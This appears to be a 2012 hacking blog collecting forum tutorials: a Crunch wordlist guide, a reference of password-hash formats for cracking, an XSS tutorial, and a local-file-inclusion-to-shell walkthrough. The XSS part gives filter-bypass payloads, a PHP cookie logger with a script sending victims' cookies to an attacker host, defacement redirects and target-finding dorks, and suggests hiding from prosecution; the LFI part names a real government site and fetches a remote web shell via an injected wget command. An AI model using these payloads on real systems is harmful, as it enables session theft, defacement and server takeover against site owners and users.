Wednesday, August 29, 2012

Wordlists manipulation and generation with Backtrack 5R2 Crunch application



Tutorial provided by



Brief Introduction:

Ok. This tutorial is going to introduce you with a Backtrack application called Crunch.
Most plainly said Crunch itself is a tool for wordlists generation. In this tutorial I’m going to explain some of its main options (not all), the way to use it, charsets, pros and cons and of course how it might come in handy.


I. How to install

First you’ll need Backtrack, of course. You can either run it in virtualization on a virtual machine like vmware or virtualbox. I will not cover how to boot Backtrack, there have already been lots of tutorials.

Now I assume most of the people around here know how to run applications in Ubuntu but nevertheless, I’ve made a part for the installation for those who aren’t familiar with unix-based OS and live CD distributions.

Open up a terminal and type:

Code:
wget http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.2.tgz



Once downloaded, going to extract it.



Code:
tar xvf crunch-3.2.tgz

Accessing directory:

Code:
cd crunch3.2/

Compiling and installing:

Code:
make
Code:
make install





II. How to use


Once installed we can start generating our wordlists.

Basic usage:


Code:
./crunch [minimum length] [maximum length]  [charset / options]

For example:

Code:
./crunch 1 5 abc123 –o wordlist.txt

This will generate all possible combinations between the characters “a, b, c, d, 1, 2, 3” with a min length of 1 and maximum of 5. Now the –o [file] option enables us to save all generated combinations to a file.

As well as that, when working out the charset, symbols are to be divided by a backslash "\".

For example:

Code:
./crunch 1 5 abc\!\*\( -o wordlist.txt


Permutations:

Permutations can be created by using the –p switch between words, letters, numbers, symbols.

For example:

Code:
./crunch 1 1 –p example of permutation


One thing you might’ve noticed is that we set min/max length again, no matter that we have a permutation, we still need to include them else rather it won’t do.

In that example we used 3 words, which will be a permutation of three. In other words P3 = 3*2*1 = 6 possible combinations (without any repeating).

Splitting generated combinations into separate lists with predefined size:

For this purpose we’ll have to use the –b switch which is designed to set the size of each file. So whenever crunch generates combinations that exceed let’s say 10mb, for example, it will locate the next generations into a separate file.

For example:

Code:
./crunch 1 8 abcdABCD –b 30mb –o START


This will split all generations of combinations between “a, b, c, d, A, B, C, D” in separate files, none exceeding the size of 30mb.

For all options and full usage of crunch visit its man page.

Hope this tutorial would come in handy for members!

-------------------------------

I decided this thread would be suitable for me to include a small project of mine written in PHP. It's again for wordlists generation, although not the best language for such.

PHP Code:
<?php

ini_set
('max_execution_time''65');$values 'ABCDEF';

container(strlen($values), );

function 
container($length$pos$out '' ){
    global 
$values;

    for (
$i 0$i $length; ++$i){
  if (
$pos $length ){
    
container($length$pos 1$out $values[$i]);
  }
    }

    if(
strlen($out) <= 6){
  echo 
$out '<br />';
  }
}
?>

Anyone experiencing problems with the code or wants me to explain something may feel free to post a reply to the tutorial.


Thanks for reading!

Hashing Algorithms and Types


Tutorial provided by

DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"), then there follows the actual hash.
Notes: [1] [2]

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))
Note: [1]

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(APR)
Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
Used in Linux and other similar OS.
Length: 37 characters.
Description: The hash begins with the $apr1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(phpBB3)
Example: $H$9123456785DAERgALpsri.D9z3ht120
Used in phpBB 3.x.x.
Length: 34 characters.
Description: The hash begins with the $H$ signature, then there goes one character (most often the number '9'), then there goes the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2048 times.
Notes: [1] [2]

MD5(Wordpress)
Example: $P$B123456780BhGFYSlUqGyE6ErKErL01
Used in Wordpress.
Length: 34 characters.
Description: The hash begins with the $P$ signature, then there goes one character (most often the number 'B'), then there goes the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 8192 times.
Notes: [1] [2]

MySQL
Example: 606717496665bcba
Used in the old versions of MySQL.
Length: 8 bytes.
Description: The hash consists of two DWORDs, each not exceeding the value of 0x7fffffff.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.

RAdmin v2.x
Example: 5e32cceaafed5cc80866737dfb212d7f
Used in the application Remote Administrator v2.x.
Length: 16 bytes.
Algorithm: The password is padded with zeros to the length of 100 bytes, then that entire string is hashed with the MD5 algorithm.

MD5
Example: c4ca4238a0b923820dcc509a6f75849b
Used in phpBB v2.x, Joomla version below 1.0.13 and many other forums and CMS.
Length: 16 bytes.
Algorithm: Same as the md5() function in PHP.

md5($pass.$salt)
Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234
Used in WB News, Joomla version 1.0.13 and higher.
Length: 16 bytes.
Note: [1]

md5($salt.$pass)
Example: f190ce9ac8445d249747cab7be43f7d5:12
Used in osCommerce, AEF, Gallery and other CMS.
Length: 16 bytes.
Note: [1]

md5(md5($pass))
Example: 28c8edde3d61a0411511d3b1866f0636
Used in e107, DLE, AVE, Diferior, Koobi and other CMS.
Length: 16 bytes.

md5(md5($pass).$salt)
Example: 6011527690eddca23580955c216b1fd2:wQ6
Used in vBulletin, IceBB.
Length: 16 bytes.
Notes: [1] [3] [4]

md5(md5($salt).md5($pass))
Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S
Used in IPB.
Length: 16 bytes.
Notes: [1] [3]

md5(md5($salt).$pass)
Example: 816a14db44578f516cbaef25bd8d8296:1234
Used in MyBB.
Length: 16 bytes.
Note: [1]

md5($salt.$pass.$salt)
Example: a3bc9e11fddf4fef4deea11e33668eab:1234
Used in TBDev.
Length: 16 bytes.
Note: [1]

md5($salt.md5($salt.$pass))
Example: 1d715e52285e5a6b546e442792652c8a:1234
Used in DLP.
Length: 16 bytes.
Note: [1]

SHA-1
Example: 356a192b7913b04c54574d18c28d46e6395428ab
Used in many forums and CMS.
Length: 20 bytes.
Algorithm: Same as the sha1() function in PHP.

sha1(strtolower($username).$pass)
Example: Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Used in SMF.
Length: 20 bytes.
Note: [1]

sha1($salt.sha1($salt.sha1($pass)))
Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
Used in Woltlab BB.
Length: 20 bytes.
Note: [1]

SHA-256(Unix)
Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqiKSNK1rkTk9zYE1v0
Used in Linux and other similar OS.
Length: 55 characters.
Description: The hash begins with the $5$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-256 algorithm 5000 times.
Notes: [1] [2]

SHA-512(Unix)
Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEmFNLlq6Ik9X3reMXY3doKEuxrcDohKUx0Oxf44aeTIxGEjssvtT1aKyZHjs
Used in Linux and other similar OS.
Length: 98 characters.
Description: The hash begins with the $6$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-512 algorithm 5000 times.
Notes: [1] [2]

SHA-1(Django) = sha1($salt.$pass)
Example: sha1$12345678$90fbbcf2b72b5973ae42cd3a19ab4ae8a1bd210b
12345678 is salt (in the hexadecimal format)
90fbbcf2b72b5973ae42cd3a19ab4ae8a1bd210b is SHA-1 hash.

SHA-256(Django) = SHA-256($salt.$pass)
Example: sha256$12345678$154c4c511cbb166a317c247a839e46cac6d9208af5b015e1867a84cd9a56007b
12345678 is salt (in the hexadecimal format)
154c4c511cbb166a317c247a839e46cac6d9208af5b015e1867a84cd9a56007b is SHA-256 hash.

SHA-384(Django) = SHA-384($salt.$pass)
Example: sha384$12345678$c0be393a500c7d42b1bd03a1a0a76302f7f472fc132f11ea6373659d0bd8675d04e12d8016d83001c327f0ab70843dd5
12345678 is salt (in the hexadecimal format)
c0be393a500c7d42b1bd03a1a0a76302f7f472fc132f11ea6373659d0bd8675d04e12d8016d83001c327f0ab70843dd5 is SHA-384 hash.

SHA-1(ManGOS) = sha1(strtoupper($username).':'.$pass)

SHA-1(ManGOS2) = sha1($username.':'.$pass)

MD5(Custom) = '=='.md5(md5(md5($pass).md5($pass).md5($pass).md5($pass)))

md5(3 x strtoupper(md5($pass))) = md5(strtoupper(md5(strtoupper(md5(strtoupper(md5($pass)))))))

MD5(ZipMonster) = 50000 x strtoupper(md5(strtoupper($pass)))

------------------------------------------------- 

Notes:

[1] Since the hashing requires not only a password but also a salt (or a user name), which is unique for each user, the attack speed for such hashes will decline proportionally to their count (for example, attacking 100 hashes will go 100 times slower than attacking one hash).

[2] The hash is to be loaded to the program in full, to the "Hash" column - the program will automatically extract the salt and other required data from it.

[3] The ':' character can be used as salt; however, since it is used by default for separating hash and salt in PasswordsPro, it is recommended that you use a different character for separating fields; e.g., space.

[4] Salt can contain special characters - single or double quotes, as well as backslash, which are preceded (after obtaining dumps from MySQL databases) by an additional backslash, which is to be removed manually. For example, the salt to be loaded to the program would be a'4 instead of a\'4, as well as the salts a"4 instead of a\"4 and a\4 instead of a\\4.

Tuesday, August 28, 2012

Full Ultimate Cross-Site Scripting (XSS) Tutorial


Tutorial provided by



Hello and thanks for reading this tutorial on XSS, written by me. You may be asking as to why I'm creating this tutorial. My inbox has lately been flooding, and I've recieved a lot of requests on making this tutorial. I've posted my XSS attacks on Google, Facebook, Defense.gov, and other huge sites. I've even exploited HackForums' security with XSS.


What is XSS?

XSS stands for Cross-Site-Scripting. It is basically an attack, that is used to execute HTML and Javascript on the web-page. This attack can be done by submitting queries into text-boxes, or even into the URL. The results come back reading the text as HTML, so it executes the scripts instead of displaying them in plain text. With an XSS attack, you can steal cookies from a Web-Administrator, or even use some social-engineering to manipulate someone into download a virus that you've created. Such as a Botnet, or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very mild. Most of my attacks are mild XSS attacks, that can be difficult to use against a website. There are many ways to use XSS to your advantage. I will name a few examples. You can use an alert box to advertise yourself, or alert the web-admin that you've discovered a security breach involving XSS. You can also setup a Cookie-Stealer/Logger. Anything you can do with HTML, can be used against a site with this attack. I will explain some of the most important terms associated with XSS.

What is HTML and Javascript?

HTML
HTML is sort of like a programming language. The distinctions between a programming language, and HTML, are not too far apart. They are both languages, that are used to create attributes, and events. HTML is a markup language, which is used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons, and other stuff that can be used in a webpage. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML.

Javascript
Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java, is a language that ressembles to C++, it can be used in games, and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in Webpages than HTML is. Javascript is used, more in applications outside of webpages. Like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic.

XSS: My first attack.
Now, let's start getting into the really good stuff. In this section, I'll be explaining how to use XSS to your advantage. We will also be launching our very first attack with XSS, if you know the basics to XSS, you can skip this section, because I doubt you will learn anything that you don't briefly know yet. 

Now, our first step, is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is, it can take time to determine whether the site is really vulnerable. With SQLi, you can just add a little '. But in XSS, you must submit (sometimes) multiple queries, to test your site for XSS. 

Most vulnerable sites will contain a Search, Login, or a Register area. Pretty much anywhere that contains a text-box, can be exploited with XSS. HOWEVER, many people forget this fact, and never use it to their full potential because they think it's useless. You can exploit XSS through the source aswell. You can't just take any script, and edit the full thing. But editing an "onmouseover" script, is definitely an exception. I will be explaining this method of XSS later on, for now, we need the complete basics. 

Anyways, our site should have some Text-Boxes to input some HTML in. I will simply be using a search bar.

So, lets try putting in the most known, BASIC query of all time. 


Code:
<script>alert("XSS")</script>

That little script, is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter, is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes, these filters are very weak, and can be by-passed very easily, other times, they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blockin the alert. Here's an example of this kind of filter:


Code:
<script>alert("XSS")</script>


Code:
<script>alert( > XSS DETECTED < )</script>

It will block the quotes. So how the hell do we get passed that? Well, thankfully there's a way to encrypt the full message :). We will be using a little function called "String.FromCharCode". The name of it pretty much explains it all. It encrypts our text, into ASCII. An example of this encryption, would be like this:


Code:
String.fromCharCode(88,83,83)

Yes, it can be a little bit confusing, but with a little bit of explaining, and testing, it is quite simple. Here is what our full query will look like:


Code:
<script>alert(String.fromCharCode(88,83,83))</script>

You do NOT need ANY quotes in the simple query like that. So lets put that back in the search bar, and voila! It worked! We got an alert box saying "XSS"! If you still didn't get any alert box, try some of these queries that I like to use:


Code:
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))


Yes, I just wrote all those down, and it took longer than it should've, but they all work in their own way, so try as many of them as you can. I've attacked some pretty huge sites with some of those queries. I create my own queries sometimes, you should create some too, they can come in handy a lot.


XSS: Advanced Methods

Now, in this section I will be sharing some ways to use XSS maliciously against a site. Now, keep in mind all malicious attacks sent over to a system, site, or server, is illegal and you CAN be prosecuted for these actions. So ALWAYS use protection if you're planning on doing something malicious to the site. If you want to make a little alert box pop up, you shouldn't need a Proxy/VPN.

Cookie Stealing/Logging

Now, cookie stealing is about the most malicious thing we can do with Non-Persistent XSS. A cookie stealer/logger, will log the cookies of the user who access the page to a certain document. The easiest way to do this, would be with a three step process.

First, you should setup a site. Personally, I find http://www.000webhost.com/ the best for upload malicious code, programs, or anything else. So go ahead and register there.

Now, once you've created your site, go to the file manager. Create a new file. Call it "CookieLog.txt". Leave the code blank. Now, create another file after that, called "CookieLogger.php". In CookieLogger.php, we need to add some code, so that it sends the cookies that we log, into our Cookie Log. Add this code, into it (Just make sure the file name has .php, or else it will not run the PHP code (Which is an enormous problem)). 


Code:
<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./CookieLog.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +        // Numeric
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
        "abcdefghijklmnopqrstuvwxyz" +
        "-_.!~*'()";        // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+";                // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert( "Unicode Character '"
    + ch
    + "' cannot be encoded using standard URL encoding.\n" +
                    "(URL encoding only supports 8-bit characters.)\n" +
          "A space (+) will be substituted." );
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>


Now that we have our Cookie Logger script, we can send the cookie logger to our best friend, the Web-Admin :). To do this, we should probably Tiny the URL. Or if you can figure out how to Spoof the URL, that will work too.

To Tiny the URL, go to http://www.spam.com/ and just put in the URL. But hold one, we need to add a script into our XSS vulnerability. This is the script that will start our Cookie Logging.


Code:
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

So just add that script after the URL, then tiny it, and send it to our Web-Admin, now this can take some time for the Admin to actually click it. Sometimes, the Admin won't click it, so if it takes too long, you should just give up and find another way to exploit it. 

Once you get the cookie, you can use "Cookie Manager" Firefox addon to manipulate and edit the cookies so that you can hijack the administrators session. I find Cookie Manager a very useful app for XSS, make sure to download it.


Defacing

Defacing is one of the most common things people like to do when they have access to multiple administrator options. Mostly so that they can advertise themselves, and simply let the administrator know that their security has been breached. Anyways, defacing with XSS requires persistent XSS, maybe a comment box, or something. You can use this script to create a re-direct to your deface page (You should probably redirect it to your deface on Pastehtml.com, because it's anonymous uploading.)


Code:
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>

XSS: Javascript Events

Onmousover isn't a very exploitable vulnerability. But yet, it is still considered XSS. An onmouseover vulnerability would look something like this:


Code:
onmouseover=prompt1337

We can exploit this, by editing it to:


Code:
onmouseover=alert("XSS")

Very basic vulnerability, but it's getting more noticed, and patched in a lot more websites. Most sites will use Adobe Flash or CSS to do those kind of effects now. 


XSS Filter Bypassing Techniques

Sometimes a simple XSS query just won't do the trick. The reason your query isn't working, is because the website has a WAF or Filter set in place. A filter will block as many XSS and SQLi queries as possible. In this case, we're dealing with XSS.

There are many ways on bypassing XSS filters, but I will only explain a few.



Hex Bypassing

With blocked characters like >, <, and /, it is quite difficult to execute an XSS query. Not to worry, there's always a solution :) You can change your characters, into Hex. A Hex of a certain character, is basically the character, but in a different format. These should help you out:

> = %3e
< = %3c
/ = %2f



ASCII Bypassing

With an ASCII encryption, we can use the character ". Which is blocked quite a bit. This is one of the most common XSS Filter bypasses of all time. A script that you would need to encrypt, would look like this:

NOT WORKING SCRIPT


Code:
<script>alert("XSS")</script>

WORKING SCRIPT


Code:
<script>alert(String.fromCharCode(88,83,83))</script>

To encrypt your little part of a script, go to this site: http://www.wocares.com/noquote.php I use that site, and find it quite useful.



Case-Sensitive Bypassing

This kind of bypass rarely works, but it's always worth a shot. Some filters are set in place to detect certain strings, however, the filter's strings that are blocked are CASE SENSITIVE. So all we need to do, is execute a script, with different sizes of characters. This bypass, would look like this:


Code:
<ScRiPt>aLeRt("XSS")</ScRiPt>

You can also mix that with ASCII encryption if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones. 



Some XSS Dorks

It's usually best to create/find your own dorks, but in this tutorial, I'll write some up real quick to share:


Code:
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx

Those dorks are about as basic as they can get, sorry if they do not satisfy you. I rarely use dorks, and with this tutorial you shouldn't need to use dorks to find a vulnerable site. XSS is a very popular vulnerability. Even in google I found some. Some in HackForums too. XSS isn't a very high-priority, at least not Non-Persistent.

Monday, August 27, 2012

Local File Inclusion to shell upload


Tutorial provided by


Things you will need:

1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ )
4) Mozilla Firefox

First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it)
Try to open etc/passwd

Example:

Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd


Ok fine...We can open etc/passwd
Now type proc/self/environ

Example:

Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ


Now download and install User-Agent switcher.

Go to Tools > Default User-Agent > Edit User Agents
You will get this window.

Now make new user-agent
Go to New > New User-Agent



Now leave everything as it is exept description and user-agent.
In description enter name of it (Mine is phpinfo)

In User-Agent paste this in there.


Code:
<?php phpinfo();?>


Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

Go to your site and refresh it.




Now search for "disable_functions" (Ctrl+F Search function)

Mine is

Code:
disable_functions     | no value    | no value


That is good.We can spawn our shell now!

Now go back and edit your User-Agent.

Change "User-Agent" to:

Code:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>


(What this function do?. It downloads shell in .txt format and renames it as shell.php)

Save it and refresh your site.

Go to http://www.yourLFIsite.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )

Voila,we have our shell up.
Enjoy.